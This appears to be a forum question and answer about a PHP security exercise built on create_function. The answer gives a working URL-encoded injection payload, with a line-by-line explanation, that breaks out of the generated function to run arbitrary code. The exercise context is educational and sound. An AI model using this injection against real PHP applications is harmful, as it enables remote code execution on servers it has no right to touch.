I came across a site where you can do some excercises regarding cyber security.
From what I understand you have to do PHP injection. I looked online for examples but still I could not implement them.
Any help or tips would be appreciated, also if this is not the right place to ask this kind of questions please let me know.
The code:
<body>
<div class="corb-centered corb-php text-center">
<h3>
<a target="_blank" href="/index.php?source">source</a>
</h3>
<h3>
Start here : <a href="/index.php?code=echo 'hello foobar';">Hello foobar</a>
</h3>
<div class="text-left">
<h3>Output : </h3>
<pre><code><?php
if (isset($_GET['code'])) {
$new_func = create_function('', $_GET['code']);
if ($_GET['code'] === "echo 'hello foobar';") {
$new_func();
}
}
?></code></pre>
</div>
</div>
</body>
I've tried everything I know:
ls']); $new_func();//
ls']); $new_func(); print('
ls; $new_func();//
ls''); $new_func();//
...
According to the PHP docs:
Caution This function internally performs an eval() and as such has the same security issues as eval().
This is exactly what can be exploited in this case. PHP basically just glues function __lambda_func(<args>) {<code>} together and then evaluates it.
Using the following code parameter should output the string do something else...
/index.php?code=%7D%20%24_GET%5B%27code%27%5D%20%3D%20"echo%20%27hello%20foobar%27%3B"%3B%20echo%20%27do%20something%20else..%27%3B%20%2F%2F
Decoded version:
} $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //
Explained version:
} # end the function body prematurely so the following code is executed immediately
$_GET['code'] = "echo 'hello foobar';"; # trick the IF check by overwriting what's actually in $_GET['code']
echo 'do something else..'; # any code that should be executed goes here
// # comment out the function-body closing brace that is added by PHP after the code